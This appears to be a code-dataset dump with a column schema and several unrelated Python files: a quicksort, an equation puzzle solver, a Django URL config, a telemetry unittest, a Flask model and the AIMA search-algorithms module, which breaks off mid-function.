blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9d3f1e1eaaf40864ef9e266b4fd7d25f9d328b21 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /mYGipMffRTYxYmv5i_3.py | 1c5ebcf46c86f6f779f84e38b73917754d45490f | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,929 | py |
import itertools


def _match_ops(first_num, second_num, target):
    """Return 'first<op>second=target' for the first operator among
    +, -, *, / that makes the equation true, or None if none does.

    Division matches only on exact integer division, so e.g. 7/2 is not
    reported as equal to 3 (the original floor-division check did that),
    and division by zero is guarded explicitly instead of via try/except.
    """
    if first_num + second_num == target:
        return '{}+{}={}'.format(first_num, second_num, target)
    if first_num - second_num == target:
        return '{}-{}={}'.format(first_num, second_num, target)
    if first_num * second_num == target:
        return '{}*{}={}'.format(first_num, second_num, target)
    # BUG FIX: `first // second == target` accepted floor-division artifacts
    # (7 // 2 == 3); require exact divisibility and a nonzero divisor.
    if (second_num != 0 and first_num % second_num == 0
            and first_num // second_num == target):
        return '{}/{}={}'.format(first_num, second_num, target)
    return None


def simple_equation(a, b, c):
    """Find an equation 'x<op>y=z' that uses each of a, b, c exactly once.

    For every ordered pair drawn from (a, b, c), only the first of c, b, a
    that differs from both pair members is tried as the target (this mirrors
    the original elif chain).  Returns '' when no equation exists.
    """
    numbers = [a, b, c]
    for first_num, second_num in itertools.permutations(numbers, 2):
        for target in (c, b, a):
            if target != first_num and target != second_num:
                equation = _match_ops(first_num, second_num, target)
                if equation is not None:
                    return equation
                break  # only the first eligible target is tested per pair
    return ''
| [
"[email protected]"
] | |
def partition(CustomList, low, high):
    """Lomuto partition: move CustomList[high] (the pivot) into its final
    sorted position within CustomList[low..high] and return that index.
    Elements <= pivot end up left of it, larger elements to its right.
    Operates in place."""
    pivot = CustomList[high]
    boundary = low - 1  # last index known to hold a value <= pivot
    for cursor in range(low, high):
        if CustomList[cursor] <= pivot:
            boundary += 1
            CustomList[boundary], CustomList[cursor] = (
                CustomList[cursor], CustomList[boundary])
    # Drop the pivot just past the <=-pivot region.
    CustomList[boundary + 1], CustomList[high] = (
        CustomList[high], CustomList[boundary + 1])
    return boundary + 1
def Quicksort(CustomList, low, high):
    """Sort CustomList[low..high] (inclusive indices) in place using
    recursive quicksort, partitioning around CustomList[high]."""
    if low >= high:
        return  # zero or one element: already sorted
    split = partition(CustomList, low, high)
    Quicksort(CustomList, low, split - 1)
    Quicksort(CustomList, split + 1, high)
# Demo driver: sort a sample list in place and print it before and after.
BasicList = [2, 6, 4, 8, 1, 3]
print(BasicList)
# Sort the whole list: inclusive index range [0, 5].
Quicksort(BasicList, 0, 5)
print(BasicList) | [
"[email protected]"
] | |
f155e40ab83b0e0703d0bfe760ae2c41de4fcdb7 | e5e9ee9e4db2e400e7f87647501ee412c13d76e5 | /python/python-base/turtle/fun.py | 5cab82c491cf1fee60b9d184422b03d78cfa699e | [] | no_license | beingveera/whole-python | 524441eec44379c36cb1cfeccdbc65bf1c15d2f6 | 3f2b3cb7528afb9605ab6f9d4d2efc856a247af5 | refs/heads/main | 2023-05-15T06:28:03.058105 | 2021-06-05T09:37:47 | 2021-06-05T09:37:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | import turtle as t
# Turtle-graphics doodle; `t` is the turtle module (imported as `t` above).
t.fd(1000)               # walk the turtle forward 1000 px
t.setposition(200,-490)  # move to absolute (200, -490), drawing on the way
t.clear()                # erase everything drawn so far
t.speed(0.1)             # slow the animation down
t.circle(-50)            # radius-50 circle, clockwise (negative radius)
t.tracer(1,3)            # redraw every update, 3 ms delay between frames
t.color('blue')
t.pensize(10)
t.circle(20) | [
"[email protected]"
] | |
dcec9dfe44d580ff70c968b38dcb5e9e06fac39d | eb57e632fb351db1975ad0e15bd480759bbc153b | /sysinf/urls.py | 3c44a5f757052a14c4ca9c32626da21663101d8a | [
"MIT"
] | permissive | raikel/dnfas | 163ebc59fc6d4a12c044de33136cdce7ed7ddf0e | 567bcc6656c75ee5167bd248045ec24e37de07b8 | refs/heads/master | 2021-06-27T02:22:30.508109 | 2020-03-25T20:11:04 | 2020-03-25T20:11:04 | 224,517,088 | 0 | 0 | MIT | 2021-03-19T22:52:15 | 2019-11-27T21:07:07 | Python | UTF-8 | Python | false | false | 167 | py | from django.urls import path
from .views import SystemStatsView
# URL namespace for this app; reverse with 'sysinf:system'.
app_name = 'sysinf'
# GET /system/ -> SystemStatsView (host system statistics endpoint).
urlpatterns = [
    path('system/', SystemStatsView.as_view(), name='system')
]
| [
"[email protected]"
] | |
8348e16c6785697fe7de5e82d5b2cccf17d8a39d | 56231e5b77a8b743e84e43d28691da36b89a0cca | /platform-tools/systrace/catapult/telemetry/telemetry/testing/run_tests_unittest.py | 8728813fb8ee52fb77629c0039869526582c60cf | [
"MIT",
"LicenseRef-scancode-proprietary-license",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | cricketclubucd/davisdragons | ee3aa6ad72197c2218660843e03d58c562b965aa | 99d5877377b80d1b20c78cc3c4c6f26795f29b14 | refs/heads/master | 2023-01-30T05:37:45.923195 | 2021-01-27T06:30:25 | 2021-01-27T06:30:25 | 96,661,120 | 2 | 2 | MIT | 2023-01-23T18:42:26 | 2017-07-09T04:32:10 | HTML | UTF-8 | Python | false | false | 3,762 | py | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry.core import util
from telemetry.testing import run_tests
class MockArgs(object):
  """Minimal stand-in for run_tests' parsed command-line arguments,
  carrying only the attributes the classifier reads, with defaults."""

  def __init__(self):
    self.positional_args = []
    self.skip = []
    self.exact_test_filter = True
    self.run_disabled_tests = False
class MockPossibleBrowser(object):
  """Fake PossibleBrowser: records the browser type, tab-control support,
  and a MockPlatform built from the given OS identifiers."""

  def __init__(self, browser_type, os_name, os_version_name,
               supports_tab_control):
    self.browser_type = browser_type
    self.supports_tab_control = supports_tab_control
    self.platform = MockPlatform(os_name, os_version_name)
class MockPlatform(object):
  """Fake platform exposing only the OS name/version accessors that the
  test classifier consults."""

  def __init__(self, os_name, os_version_name):
    self.os_name = os_name
    self.os_version_name = os_version_name

  def GetOSName(self):
    return self.os_name

  def GetOSVersionName(self):
    return self.os_version_name
class RunTestsUnitTest(unittest.TestCase):
  # Exercises run_tests.GetClassifier() against the disabled_cases.py
  # fixture to check that per-platform enable/disable annotations select
  # the expected set of tests.

  def _GetEnabledTests(self, browser_type, os_name, os_version_name,
                       supports_tab_control, args=None):
    """Return the bare method names typ would run for the given fake browser.

    Builds a typ.Runner rooted at the telemetry directory, pointed at
    telemetry/testing/disabled_cases.py, installs a classifier for a
    MockPossibleBrowser with the requested traits, and collects the
    parallel tests that survive classification.
    """
    if not args:
      args = MockArgs()
    runner = run_tests.typ.Runner()
    host = runner.host
    runner.top_level_dir = util.GetTelemetryDir()
    runner.args.tests = [host.join(util.GetTelemetryDir(),
                                   'telemetry', 'testing', 'disabled_cases.py')]
    possible_browser = MockPossibleBrowser(
        browser_type, os_name, os_version_name, supports_tab_control)
    runner.classifier = run_tests.GetClassifier(args, possible_browser)
    _, test_set = runner.find_tests(runner.args)
    # Names come back fully qualified; keep only the method name.
    return set(test.name.split('.')[-1] for test in test_set.parallel_tests)

  def testSystemMacMavericks(self):
    # Mac + Mavericks: mac/mavericks/system-only cases all enabled.
    self.assertEquals(
        set(['testAllEnabled',
             'testMacOnly',
             'testMavericksOnly',
             'testNoChromeOS',
             'testNoWinLinux',
             'testSystemOnly',
             'testHasTabs']),
        self._GetEnabledTests('system', 'mac', 'mavericks', True))

  def testSystemMacLion(self):
    # Same as above but on Lion: the Mavericks-only case drops out.
    self.assertEquals(
        set(['testAllEnabled',
             'testMacOnly',
             'testNoChromeOS',
             'testNoMavericks',
             'testNoWinLinux',
             'testSystemOnly',
             'testHasTabs']),
        self._GetEnabledTests('system', 'mac', 'lion', True))

  def testCrosGuestChromeOS(self):
    # ChromeOS guest session: ChromeOS-only cases run, mac/win cases don't.
    self.assertEquals(
        set(['testAllEnabled',
             'testChromeOSOnly',
             'testNoMac',
             'testNoMavericks',
             'testNoSystem',
             'testNoWinLinux',
             'testHasTabs']),
        self._GetEnabledTests('cros-guest', 'chromeos', '', True))

  def testCanaryWindowsWin7(self):
    # Canary channel on Windows 7 with tab control.
    self.assertEquals(
        set(['testAllEnabled',
             'testNoChromeOS',
             'testNoMac',
             'testNoMavericks',
             'testNoSystem',
             'testWinOrLinuxOnly',
             'testHasTabs']),
        self._GetEnabledTests('canary', 'win', 'win7', True))

  def testDoesntHaveTabs(self):
    # Without tab control the tab-dependent case is filtered out.
    self.assertEquals(
        set(['testAllEnabled',
             'testNoChromeOS',
             'testNoMac',
             'testNoMavericks',
             'testNoSystem',
             'testWinOrLinuxOnly']),
        self._GetEnabledTests('canary', 'win', 'win7', False))

  def testSkip(self):
    # --skip accepts glob patterns and fully-qualified names alike.
    args = MockArgs()
    args.skip = ['telemetry.*testNoMac', '*NoMavericks',
                 'telemetry.testing.disabled_cases.DisabledCases.testNoSystem']
    self.assertEquals(
        set(['testAllEnabled',
             'testNoChromeOS',
             'testWinOrLinuxOnly',
             'testHasTabs']),
        self._GetEnabledTests('canary', 'win', 'win7', True, args))
| [
"[email protected]"
] | |
bb1db72e1417f503a51c53cab45015887b5df63a | 8ba041911be24ba453d6df60ddf47e7d2aedfde5 | /model.py | ff354766fccfa1efd6fe85425ef183d0be6f6c83 | [] | no_license | dmcdekker/testing-1 | 9c0beda3fbdb9d37a812e903800f4c976cd0bbae | ee6cbab6aec40adde9971005d9c79862fb3bfe7a | refs/heads/master | 2020-03-15T14:07:38.046358 | 2018-05-04T19:58:29 | 2018-05-04T19:58:29 | 132,183,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 935 | py | from flask.ext.sqlalchemy import SQLAlchemy
# Single shared SQLAlchemy handle; bound to a Flask app in connect_to_db().
db = SQLAlchemy()
class Game(db.Model):
    """Board game."""

    __tablename__ = "games"

    # Surrogate primary key.
    game_id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    # Display name; required and unique (max 20 chars).
    name = db.Column(db.String(20), nullable=False, unique=True)
    # Optional short blurb (max 100 chars).
    description = db.Column(db.String(100))
def connect_to_db(app, db_uri="postgresql:///games"):
    """Bind the shared `db` object to the given Flask app.

    db_uri defaults to the local 'games' PostgreSQL database; tests pass a
    throwaway URI instead.
    """
    app.config['SQLALCHEMY_DATABASE_URI'] = db_uri
    db.app = app  # lets db.session be used outside a request context
    db.init_app(app)
def example_data():
    """Create example data for the test database."""
    # Two sample rows consumed by the test suite.
    game1 = Game(name="My Little Pony", description="A pony game")
    game2 = Game(name="Good or Evil", description="Are you good or evil?!")
    db.session.add_all([game1, game2])
    db.session.commit()
if __name__ == '__main__':
    # Run standalone: bind to the real database for interactive use.
    from server import app
    connect_to_db(app)
    print "Connected to DB."
| [
"[email protected]"
] | |
d44f01bcd4e7d2b34ab46450cdb1c6ab87d512a1 | f3daf8a0bf10c38e8a96b518aa08195241adf7cb | /HW1b/search.py | 5bcde67610641f501f48b5b43d19114b792f6787 | [] | no_license | trademark152/Artificial_Intelligence_USC | c9dc8e70a6bc2228ccfaeb911e497de82b4f7b9a | 5e3464c9af84786d540fe74a275f835395d6836a | refs/heads/master | 2020-09-26T09:31:06.840819 | 2019-12-06T02:16:56 | 2019-12-06T02:16:56 | 226,227,591 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,545 | py | """Search (Chapters 3-4)
The way to use this code is to subclass Problem to create a class of problems,
then create problem instances and solve them with calls to the various search
functions."""
from __future__ import generators
from utils import *
import agents
import math, random, sys, time, bisect, string
# ______________________________________________________________________________
class Problem:
    """The abstract class for a formal problem. You should subclass this and
    implement the method successor, and possibly __init__, goal_test, and
    path_cost. Then you will create instances of your subclass and solve them
    with the various search functions."""

    def __init__(self, initial, goal=None):
        """The constructor specifies the initial state, and possibly a goal
        state, if there is a unique goal. Your subclass's constructor can add
        other arguments."""
        self.initial = initial ; self.goal = goal

    def successor(self, state):
        """Given a state, return a sequence of (action, state) pairs reachable
        from this state. If there are many successors, consider an iterator
        that yields the successors one at a time, rather than building them
        all at once. Iterators will work fine within the framework."""
        # `abstract` (from utils) marks this as must-override.
        abstract

    def goal_test(self, state):
        """Return True if the state is a goal. The default method compares the
        state to self.goal, as specified in the constructor. Implement this
        method if checking against a single self.goal is not enough."""
        return state == self.goal

    def path_cost(self, c, state1, action, state2):
        """Return the cost of a solution path that arrives at state2 from
        state1 via action, assuming cost c to get up to state1. If the problem
        is such that the path doesn't matter, this function will only look at
        state2. If the path does matter, it will consider c and maybe state1
        and action. The default method costs 1 for every step in the path."""
        return c + 1

    def value(self):
        """For optimization problems, each state has a value. Hill-climbing
        and related algorithms try to maximize this value."""
        # Must be overridden by optimization-problem subclasses.
        abstract
# ______________________________________________________________________________
class Node:
    """A node in a search tree. Contains a pointer to the parent (the node
    that this is a successor of) and to the actual state for this node. Note
    that if a state is arrived at by two paths, then there are two nodes with
    the same state. Also includes the action that got us to this state, and
    the total path_cost (also known as g) to reach the node. Other functions
    may add an f and h value; see best_first_graph_search and astar_search for
    an explanation of how the f and h values are handled. You will not need to
    subclass this class."""

    def __init__(self, state, parent=None, action=None, path_cost=0):
        "Create a search tree Node, derived from a parent by an action."
        # utils.update sets the named attributes on self in one call.
        update(self, state=state, parent=parent, action=action,
               path_cost=path_cost, depth=0)
        if parent:
            self.depth = parent.depth + 1

    def __repr__(self):
        return "<Node %s>" % (self.state,)

    def path(self):
        "Create a list of nodes from the root to this node."
        # Walks parent links; result is ordered this-node-first, root last.
        x, result = self, [self]
        while x.parent:
            result.append(x.parent)
            x = x.parent
        return result

    def expand(self, problem):
        "Return a list of nodes reachable from this node. [Fig. 3.8]"
        # Each successor carries the cumulative path cost computed by the
        # problem's path_cost method.
        return [Node(next, self, act,
                     problem.path_cost(self.path_cost, self.state, act, next))
                for (act, next) in problem.successor(self.state)]
# ______________________________________________________________________________
class SimpleProblemSolvingAgent(agents.Agent):
    """Abstract framework for problem-solving agent. [Fig. 3.1]

    Subclasses must supply update_state, formulate_goal, formulate_problem
    and search.  NOTE(review): those hooks are not defined anywhere in this
    file -- confirm the concrete subclasses provide them."""

    def __init__(self):
        # BUG FIX: the base class must be referenced through the module it
        # was imported as (`import agents` above), not as a bare `Agent`.
        agents.Agent.__init__(self)
        # BUG FIX: `state` and `seq` were plain locals rebound inside
        # program(), which raises UnboundLocalError in Python 2 (no
        # `nonlocal`); keep them on the instance instead.
        self.state = []
        self.seq = []

        def program(percept):
            self.state = self.update_state(self.state, percept)
            if not self.seq:
                goal = self.formulate_goal(self.state)
                problem = self.formulate_problem(self.state, goal)
                self.seq = self.search(problem)
            # Pop and return the next action of the current plan.
            action = self.seq[0]
            self.seq[0:1] = []
            return action

        self.program = program
# ______________________________________________________________________________
## Uninformed Search algorithms
def tree_search(problem, fringe):
    """Search through the successors of a problem to find a goal.
    The argument fringe should be an empty queue; its pop order decides
    the search strategy.  Repeated paths to a state are NOT pruned.
    [Fig. 3.8]"""
    fringe.append(Node(problem.initial))
    while fringe:
        current = fringe.pop()
        if problem.goal_test(current.state):
            return current
        fringe.extend(current.expand(problem))
    return None
def breadth_first_tree_search(problem):
    "Search the shallowest nodes in the search tree first. [p 74]"
    # FIFO fringe => nodes expand in generation order (breadth-first).
    return tree_search(problem, FIFOQueue())
def depth_first_tree_search(problem):
    "Search the deepest nodes in the search tree first. [p 74]"
    # LIFO fringe => most recently generated node expands first (depth-first).
    return tree_search(problem, Stack())
def graph_search(problem, fringe):
    """Search through the successors of a problem to find a goal.
    The argument fringe should be an empty queue.  Each state is expanded
    at most once: only the first path that reaches it is pursued.
    [Fig. 3.18]"""
    visited = {}
    fringe.append(Node(problem.initial))
    while fringe:
        current = fringe.pop()
        if problem.goal_test(current.state):
            return current
        if current.state not in visited:
            visited[current.state] = True
            fringe.extend(current.expand(problem))
    return None
def breadth_first_graph_search(problem):
    "Search the shallowest nodes in the search tree first. [p 74]"
    # Graph search with a FIFO fringe: BFS with repeated-state pruning.
    return graph_search(problem, FIFOQueue())
def depth_first_graph_search(problem):
    "Search the deepest nodes in the search tree first. [p 74]"
    # Graph search with a LIFO fringe: DFS with repeated-state pruning.
    return graph_search(problem, Stack())
def depth_limited_search(problem, limit=50):
    """[Fig. 3.12] Depth-first search that gives up below `limit`.
    Returns a goal Node, the string 'cutoff' if the limit was hit on some
    branch, or None when the space within the limit holds no goal."""
    def recursive_dls(node, problem, limit):
        if problem.goal_test(node.state):
            return node
        if node.depth == limit:
            return 'cutoff'
        cutoff_occurred = False
        for child in node.expand(problem):
            outcome = recursive_dls(child, problem, limit)
            if outcome == 'cutoff':
                cutoff_occurred = True
            elif outcome is not None:
                return outcome
        if cutoff_occurred:
            return 'cutoff'
        return None

    return recursive_dls(Node(problem.initial), problem, limit)
def iterative_deepening_search(problem):
    """[Fig. 3.13] Run depth_limited_search with ever larger limits until
    it returns something other than the 'cutoff' sentinel (a goal Node or
    None)."""
    for depth in xrange(sys.maxint):
        result = depth_limited_search(problem, depth)
        # BUG FIX: was `result is not 'cutoff'` -- identity comparison with
        # a string literal depends on interpreter interning; compare by
        # value instead.
        if result != 'cutoff':
            return result
# ______________________________________________________________________________
# Informed (Heuristic) Search
def best_first_graph_search(problem, f):
    """Search the nodes with the lowest f scores first.
    You specify the function f(node) that you want to minimize; for example,
    if f is a heuristic estimate to the goal, then we have greedy best
    first search; if f is node.depth then we have depth-first search.
    There is a subtlety: the line "f = memoize(f, 'f')" means that the f
    values will be cached on the nodes as they are computed. So after doing
    a best first search you can examine the f values of the path returned."""
    # memoize caches f(n) on each node under attribute 'f' (see utils).
    f = memoize(f, 'f')
    # PriorityQueue(min, f) always pops the node with the smallest f.
    return graph_search(problem, PriorityQueue(min, f))

# Alias: greedy best-first search is just best-first search where the
# caller passes f(n) = h(n).
greedy_best_first_graph_search = best_first_graph_search
# Greedy best-first search is accomplished by specifying f(n) = h(n).
def astar_search(problem, h=None):
    """A* search is best-first graph search with f(n) = g(n)+h(n).
    You need to specify the h function when you call astar_search, or the
    problem's own h is used.  Uses the pathmax trick:
    f(n) = max(f(n), g(n)+h(n))."""
    if h is None:
        h = problem.h

    def f(n):
        # getattr(n, 'f', -infinity) reads any cached f from a parent pass.
        return max(getattr(n, 'f', -infinity), n.path_cost + h(n))

    return best_first_graph_search(problem, f)
# ______________________________________________________________________________
## Other search algorithms
def recursive_best_first_search(problem):
    """[Fig. 4.5] Recursive best-first search using problem.h as heuristic.

    Fixes relative to the original: successors are produced with
    node.expand(problem) (there is no free `expand` function), f-values use
    problem.h (Node has no `h` attribute), the alternative bound passed
    into the recursion is the f-value of the second-best successor (not the
    Node object itself), and RBFS consistently returns a
    (node-or-None, new-f-limit) pair.  Returns the goal Node or None."""
    h = problem.h

    def RBFS(node, flimit):
        if problem.goal_test(node.state):
            return node, 0
        successors = node.expand(problem)
        if len(successors) == 0:
            return None, infinity
        for s in successors:
            # pathmax: a child's f never drops below its parent's.
            s.f = max(s.path_cost + h(s), node.f)
        while True:
            successors.sort(key=lambda s: s.f)  # lowest f value first
            best = successors[0]
            if best.f > flimit:
                return None, best.f
            if len(successors) > 1:
                alternative = successors[1].f
            else:
                alternative = infinity
            result, best.f = RBFS(best, min(flimit, alternative))
            if result is not None:
                return result, best.f

    root = Node(problem.initial)
    root.f = root.path_cost + h(root)
    result, _ = RBFS(root, infinity)
    return result
def hill_climbing(problem):
    """From the initial node, keep choosing the neighbor with highest value,
    stopping when no neighbor is better. [Fig. 4.11]"""
    current = Node(problem.initial)
    while True:
        # BUG FIX: the original called expand(node, problem) with both
        # `expand` and `node` undefined, and keyed argmax on a nonexistent
        # Node.value method.
        neighbors = current.expand(problem)
        if not neighbors:
            return current.state
        # NOTE(review): assumes the concrete Problem's value() accepts a
        # state (as in later AIMA releases); the abstract signature in this
        # file takes none -- confirm against the subclasses in use.
        neighbor = argmax(neighbors, lambda n: problem.value(n.state))
        if problem.value(neighbor.state) <= problem.value(current.state):
            return current.state
        current = neighbor
def exp_schedule(k=20, lam=0.005, limit=100):
    "One possible schedule function for simulated annealing"
    # Exponentially decaying temperature, clamped to 0 once t reaches limit.
    def schedule(t):
        if t < limit:
            return k * math.exp(-lam * t)
        return 0
    return schedule
def simulated_annealing(problem, schedule=exp_schedule()):
    """[Fig. 4.5] Simulated annealing: random walk that always accepts
    uphill moves (by path_cost) and accepts downhill moves with probability
    e^(delta_e / T).  Returns the current Node once the temperature hits 0."""
    current = Node(problem.initial)
    for t in xrange(sys.maxint):
        T = schedule(t)
        if T == 0:
            return current
        # BUG FIX: successors come from expanding the current node; the
        # original called expand(node.problem) with both names undefined.
        successors = current.expand(problem)
        if not successors:
            return current  # dead end: nothing to move to
        next = random.choice(successors)
        delta_e = next.path_cost - current.path_cost
        if delta_e > 0 or probability(math.exp(delta_e / T)):
            current = next
def online_dfs_agent(a):
    "[Fig. 4.12]"
    # TODO: unimplemented placeholder carried over from the AIMA code base.
    pass #### more
def lrta_star_agent(a):
    "[Fig. 4.12]"
    # TODO: unimplemented placeholder carried over from the AIMA code base.
    pass #### more
# ______________________________________________________________________________
# Genetic Algorithm
def genetic_search(problem, fitness_fn, ngen=1000, pmut=0.0, n=20):
    """Call genetic_algorithm on the appropriate parts of a problem.
    This requires that the problem has a successor function that generates
    reasonable states, and that it has a path_cost function that scores states.
    We use the negative of the path_cost function, because costs are to be
    minimized, while genetic-algorithm expects a fitness_fn to be maximized.
    (The fitness_fn parameter is kept for interface compatibility but is
    deliberately replaced by the path_cost-based fitness below.)"""
    # BUG FIX: the start state is stored as `initial` (see Problem.__init__);
    # `initial_state` does not exist.
    states = [s for (a, s) in problem.successor(problem.initial)[:n]]
    random.shuffle(states)
    fitness_fn = lambda s: - problem.path_cost(0, s, None, s)
    return genetic_algorithm(states, fitness_fn, ngen, pmut)
def genetic_algorithm(population, fitness_fn, ngen=1000, pmut=0.0):
    """[Fig. 4.7] Evolve `population` for `ngen` generations; parents are
    drawn with probability proportional to fitness_fn, children are built
    by single-point crossover and mutated with probability pmut.  Returns
    the fittest individual of the final generation."""
    def reproduce(p1, p2):
        # Single-point crossover at a random cut.
        c = random.randrange(len(p1))
        return p1[:c] + p2[c:]

    for generation in range(ngen):
        new_population = []
        # BUG FIX: was `for i in len(population)` (an int is not iterable).
        for _ in range(len(population)):
            # BUG FIX: the helper defined below is random_weighted_selection
            # (singular); `random_weighted_selections` does not exist.
            p1, p2 = random_weighted_selection(population, 2, fitness_fn)
            child = reproduce(p1, p2)
            # BUG FIX: mutate with probability pmut -- the original's
            # `> pmut` mutated with probability 1-pmut, so the default
            # pmut=0.0 mutated every child.
            if random.uniform(0, 1) < pmut:
                child.mutate()  # NOTE(review): assumes individuals expose mutate()
            new_population.append(child)
        population = new_population
    return argmax(population, fitness_fn)
def random_weighted_selection(seq, n, weight_fn):
    """Pick n elements of seq, with replacement, each draw weighted by
    weight_fn: element e is chosen with probability weight_fn(e)/total."""
    # Cumulative weight table: totals[i] = sum of weights of seq[:i+1].
    totals = []
    running = 0
    for item in seq:
        running += weight_fn(item)
        totals.append(running)
    selections = []
    for _ in range(n):
        r = random.uniform(0, totals[-1])
        # First index whose cumulative weight exceeds r wins.
        for idx, cumulative in enumerate(totals):
            if cumulative > r:
                selections.append(seq[idx])
                break
    return selections
# _____________________________________________________________________________
# The remainder of this file implements examples for the search algorithms.
# ______________________________________________________________________________
# Graphs and Graph Problems
class Graph:
    """A graph connects nodes (verticies) by edges (links), each optionally
    carrying a length.  For example:
        g = Graph({'A': {'B': 1, 'C': 2}})
    builds a directed graph with an edge of length 1 from A to B and one of
    length 2 from A to C.  Passing directed=False also installs the inverse
    of every link, including links added later via connect().  Use nodes()
    for the node list, get(a) for a dict of links out of a, and get(a, b)
    for the length of the a->b link (None if absent).  'Lengths' can be any
    object at all, and nodes any hashable object."""

    def __init__(self, dict=None, directed=True):
        self.dict = dict or {}
        self.directed = directed
        if not directed:
            self.make_undirected()

    def make_undirected(self):
        "Make a digraph into an undirected graph by adding symmetric edges."
        for src in self.dict.keys():
            for (dest, dist) in self.dict[src].items():
                self.connect1(dest, src, dist)

    def connect(self, A, B, distance=1):
        """Add a link from A to B of the given distance; in an undirected
        graph the inverse link is added as well."""
        self.connect1(A, B, distance)
        if not self.directed:
            self.connect1(B, A, distance)

    def connect1(self, A, B, distance):
        "Add a link from A to B of given distance, in one direction only."
        self.dict.setdefault(A, {})[B] = distance

    def get(self, a, b=None):
        """With one argument, return a's outgoing links as a {node: distance}
        dict (possibly empty); with two, return the a->b distance or None."""
        links = self.dict.setdefault(a, {})
        if b is None:
            return links
        return links.get(b)

    def nodes(self):
        "Return a list of nodes in the graph."
        return self.dict.keys()
def UndirectedGraph(dict=None):
    "Build a Graph where every edge (including future ones) goes both ways."
    # Thin convenience wrapper: Graph itself adds the symmetric links.
    return Graph(dict=dict, directed=False)
def RandomGraph(nodes=range(10), min_links=2, width=400, height=300,
                curvature=lambda: random.uniform(1.1, 1.5)):
    """Construct a random graph, with the specified nodes, and random links.
    The nodes are laid out randomly on a (width x height) rectangle.
    Then each node is connected to the min_links nearest neighbors.
    Because inverse links are added, some nodes will have more connections.
    The distance between nodes is the hypotenuse times curvature(),
    where curvature() defaults to a random number between 1.1 and 1.5."""
    # NOTE(review): `nodes=range(10)` is a shared default list in Python 2;
    # it is never mutated here, so this is safe but worth knowing.
    g = UndirectedGraph()
    g.locations = {}
    ## Build the cities
    for node in nodes:
        g.locations[node] = (random.randrange(width), random.randrange(height))
    ## Build roads from each city to at least min_links nearest neighbors.
    for i in range(min_links):
        for node in nodes:
            if len(g.get(node)) < min_links:
                here = g.locations[node]
                # Distance to candidate n; infinity rules out self-links and
                # nodes already connected to `node`.
                def distance_to_node(n):
                    if n is node or g.get(node, n): return infinity
                    return distance(g.locations[n], here)
                neighbor = argmin(nodes, distance_to_node)
                # Road length = straight-line distance scaled by curvature().
                d = distance(g.locations[neighbor], here) * curvature()
                g.connect(node, neighbor, int(d))
    return g
# Simplified road map of Romania (AIMA Fig. 3.2); keys are city initials,
# values map neighboring city -> road distance.
romania = UndirectedGraph(Dict(
    A=Dict(Z=75, S=140, T=118),
    B=Dict(U=85, P=101, G=90, F=211),
    C=Dict(D=120, R=146, P=138),
    D=Dict(M=75),
    E=Dict(H=86),
    F=Dict(S=99),
    H=Dict(U=98),
    I=Dict(V=92, N=87),
    L=Dict(T=111, M=70),
    O=Dict(Z=71, S=151),
    P=Dict(R=97),
    R=Dict(S=80),
    U=Dict(V=142)))
# (x, y) map coordinates per city, used by GraphProblem.h for the
# straight-line-distance heuristic.
romania.locations = Dict(
    A=(91, 492), B=(400, 327), C=(253, 288), D=(165, 299),
    E=(562, 293), F=(305, 449), G=(375, 270), H=(534, 350),
    I=(473, 506), L=(165, 379), M=(168, 339), N=(406, 537),
    O=(131, 571), P=(320, 368), R=(233, 410), S=(207, 457),
    T=(94, 410), U=(456, 350), V=(509, 444), Z=(108, 531))
# Adjacency map of the Australian states/territories (map-coloring example);
# all listed links have unit length.
australia = UndirectedGraph(Dict(
    T=Dict(),
    SA=Dict(WA=1, NT=1, Q=1, NSW=1, V=1),
    NT=Dict(WA=1, Q=1),
    NSW=Dict(Q=1, V=1)))
australia.locations = Dict(WA=(120, 24), NT=(135, 20), SA=(135, 30),
                           Q=(145, 20), NSW=(145, 32), T=(145, 42), V=(145, 37))
class GraphProblem(Problem):
    "The problem of searching a graph from one node to another."

    def __init__(self, initial, goal, graph):
        Problem.__init__(self, initial, goal)
        self.graph = graph

    def successor(self, A):
        "Return a list of (action, result) pairs."
        # Moving to neighbor B serves as both the action and the new state.
        return [(B, B) for B in self.graph.get(A).keys()]

    def path_cost(self, cost_so_far, A, action, B):
        # Missing links cost infinity so they are never chosen.
        # NOTE(review): a link of length 0 would also fall through to
        # infinity here because of the `or` -- confirm that is intended.
        return cost_so_far + (self.graph.get(A, B) or infinity)

    def h(self, node):
        "h function is straight-line distance from a node's state to goal."
        locs = getattr(self.graph, 'locations', None)
        if locs:
